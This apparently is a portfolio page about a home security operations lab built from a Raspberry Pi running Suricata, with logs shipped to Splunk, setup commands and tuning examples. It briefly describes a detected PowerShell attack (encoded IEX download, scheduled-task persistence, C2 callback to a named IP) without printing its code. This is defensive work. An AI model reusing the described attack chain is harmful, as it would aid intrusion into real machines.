30k+
Active Suricata
detection rules
detection rules
~40%
Alert reduction
after tuning
after tuning
10k+
Daily events
indexed
indexed
6
Custom Splunk
dashboards
dashboards
01. Project Overview
A production-grade home Security Operations Center built on a Raspberry Pi Zero 2 W. Suricata IDS runs on the Pi, monitoring all network traffic and generating structured EVE JSON logs. Those logs are forwarded via rsyslog over TCP to a Splunk Enterprise instance running on a Windows PC, where custom dashboards surface alerts, DNS queries, suspicious IPs, and protocol anomalies in real time.
This lab produced a real documented detection — a PowerShell-based fileless attack caught and contained in 42 minutes. See the Incident Response writeup →
"Real detections from a $15 Pi. The SOC doesn't need to be enterprise-grade to catch real threats — it needs to be tuned, monitored, and correlated."
REAL DETECTION — Dec 10, 2024
⚠ The Lab Caught a Live Attack
Wazuh Rule 91816 fired on WIN-LAB-01 at 14:23:17 EST. Encoded PowerShell execution detected — IEX download chain plus schtasks persistence, all obfuscated in Base64. Suricata simultaneously caught the C2 callback attempt over HTTP to 185.220.101.42 (AbuseIPDB: 100/100). The SOC saw both signals before the attacker could establish a foothold.
2m 15s
TIME TO DETECTION
42 min
DETECTION TO CONTAINMENT
3
DATA SOURCES CORRELATED
ATTACK CHAIN —
Suricata (network C2) + Wazuh (host HIDS) + Splunk (correlation) → complete picture. No single tool caught it alone.
02. Architecture
┌─────────────────────────────────────────────────────┐
│ Home Network 10.0.0.0/24 │
│ │
│ [Laptop] [Phone] [IoT] [Smart TV] │
│ │ │ │ │ │
│ └────────┴───────┴────────┘ │
│ │ │
│ [Router 10.0.0.1] │
│ │ (mirror / inline) │
│ │ │
│ ┌──────────────▼──────────────┐ │
│ │ Raspberry Pi 10.0.0.153 │ │
│ │ Suricata IDS (EVE JSON) │ │
│ │ Pi-hole DNS Sinkhole │ │
│ │ rsyslog → TCP :1514 │ │
│ └──────────────┬──────────────┘ │
│ │ │
│ ┌──────────────▼──────────────┐ │
│ │ Windows PC │ │
│ │ Splunk Enterprise 9.x │ │
│ │ Wazuh HIDS (WIN-LAB-01) │ │
│ │ 6 custom dashboards │ │
│ └─────────────────────────────┘ │
└─────────────────────────────────────────────────────┘
03. Technical Specifications
IDS HARDWARE
Raspberry Pi Zero 2 W
32 GB MicroSD (Class 10)
5V / 2.5A power supply
Static IP: 10.0.0.153
IDS SOFTWARE
Raspberry Pi OS Lite
Suricata 6.x / 7.x
ET Open Ruleset (30k+ rules)
rsyslog (TCP port 1514)
SIEM PLATFORM
Splunk Enterprise 9.x
Windows 10/11 host
TCP input port 1514
Source type: _json
PERFORMANCE
<100ms detection latency
<0.1% packet loss
30–50% CPU utilisation
~15 GB / 30-day index
04. How the SOC Was Built
Six phases from bare hardware to a production-ready detection pipeline.
PHASE 01 — HARDWARE
Raspberry Pi OS, static IP, essentials
Flash Raspberry Pi OS Lite, configure static IP via nmtui, install network and monitoring tools. Disable unnecessary services — the Pi runs headless, IDS-only.
PHASE 02 — IDS ENGINE
Suricata installed from official PPA
Install Suricata from the OISF PPA to get a current build. Pull the Emerging Threats Open ruleset via
suricata-update — 30,000+ rules covering malware C2, exploits, and protocol anomalies.PHASE 03 — LOG FORMAT
EVE JSON — structured output for every event type
Configure
suricata.yaml for EVE JSON logging on eth0. Enable all event types: alert, HTTP, DNS, TLS, SSH, flow. Structured JSON makes Splunk ingestion seamless — no parsing required.PHASE 04 — LOG SHIPPING
rsyslog tails EVE JSON and ships to Splunk TCP 1514
Configure rsyslog's
imfile module to tail /var/log/suricata/eve.json and forward each line over TCP to the Windows PC. inotify mode ensures sub-second forwarding latency.PHASE 05 — SIEM
Splunk TCP input, custom index, 6 dashboards built
Create a dedicated
suricata index in Splunk, configure TCP input on port 1514 with source type _json. Build 6 dashboards surfacing alert distribution, top signatures, DNS analysis, HTTP traffic, suspicious IPs, and protocol breakdown.PHASE 06 — TUNING
~40% alert reduction over 3-week observation period
The ET Open ruleset fires on many benign home-network patterns. Suppress noisy scanner signatures and known-safe traffic via
threshold.conf. Over 3 weeks, daily alert volume dropped from ~120 to ~72 — leaving only actionable signals.05. Implementation
STEP 01 — RASPBERRY PI SETUP
Base OS, static IP, essential tools
Flash Raspberry Pi OS Lite, configure static IP via nmtui, install essentials.
sudo apt update && sudo apt full-upgrade -y sudo apt install -y vim htop net-tools tcpdump curl # Set static IP via nmtui then verify: ip -4 addr show eth0
STEP 02 — INSTALL SURICATA
IDS engine from official PPA
Install via PPA to get a current build, then verify and pull the ET Open ruleset.
sudo add-apt-repository ppa:oisf/suricata-stable sudo apt install suricata -y suricata --build-info | grep "Suricata version" sudo suricata-update # pull ET Open rules
STEP 03 — CONFIGURE EVE JSON LOGGING
Structured JSON output for every event type
Edit
/etc/suricata/suricata.yaml to enable EVE JSON and set the monitored interface.# In suricata.yaml:
af-packet:
- interface: eth0
cluster-id: 99
cluster-type: cluster_flow
outputs:
- eve-log:
enabled: yes
filetype: regular
filename: /var/log/suricata/eve.json
types:
- alert
- http
- dns
- tls
- ssh
- flow
sudo systemctl restart suricata
sudo tail -f /var/log/suricata/eve.json
STEP 04 — RSYSLOG FORWARDING TO SPLUNK
Ship EVE JSON from Pi to Splunk over TCP 1514
Create
/etc/rsyslog.d/30-suricata.conf:module(load="imfile" Mode="inotify")
input(type="imfile"
File="/var/log/suricata/eve.json"
Tag="suricata"
Severity="notice"
Facility="local6")
local6.* @@10.0.0.XXX:1514 # Windows PC IP
sudo systemctl restart rsyslog
# Test connectivity:
echo "test" | nc -w1 10.0.0.XXX 1514
STEP 05 — SPLUNK DATA INPUT
Receive and index EVE JSON in Splunk
In Splunk Web: Settings → Data Inputs → TCP → New. Configure the input to receive on port 1514 and parse as JSON.
- Port: 1514
- Source type:
_json - Index:
suricata(create new)
# Verify data is arriving: index=suricata | head 5 | table _time, event_type, alert.signature
STEP 06 — ALERT TUNING
Reduce alert volume from ~120 to ~72 daily
The Emerging Threats Open ruleset fires on many benign home-network patterns. Suppressing noisy scanner signatures and known-safe traffic reduces daily alert volume by ~40%, leaving only actionable signals. Tuning was done over a 3-week observation period.
# Example: suppress noisy rule for known scanner # In /etc/suricata/threshold.conf: suppress gen_id 1, sig_id 2013028, track by_src, ip 10.0.0.0/24
06. Splunk Dashboards
Six custom dashboards built to surface different layers of the network picture:
01Event type distribution — alert vs. DNS vs. HTTP vs. flow by count
02Top 20 alerts (last 24h) — ranked by Suricata signature name
03DNS query analysis — top queried domains, blocked domains from Pi-hole
04HTTP traffic — hostnames, methods, user-agents, response codes
05Suspicious IPs — filtered by alert severity, enriched with geolocation
06Protocol breakdown — event filtering by TCP/UDP/ICMP/DNS/TLS
07. Detection Capabilities
PROTOCOL ANALYSIS
DNS tunneling & DGA detection
HTTP suspicious user-agents
TLS certificate anomalies
SSH brute-force patterns
THREAT CATEGORIES
Malware C2 callbacks
Exploit & vulnerability scan attempts
Data exfiltration patterns
Lateral movement indicators
08. Privacy & Data Handling
All screenshots and log samples shared publicly have been sanitised: internal IP addresses masked, domain names of non-malicious hosts redacted, and no personally identifiable information included. Suricata EVE JSON logs remain local to the home network and are not uploaded anywhere.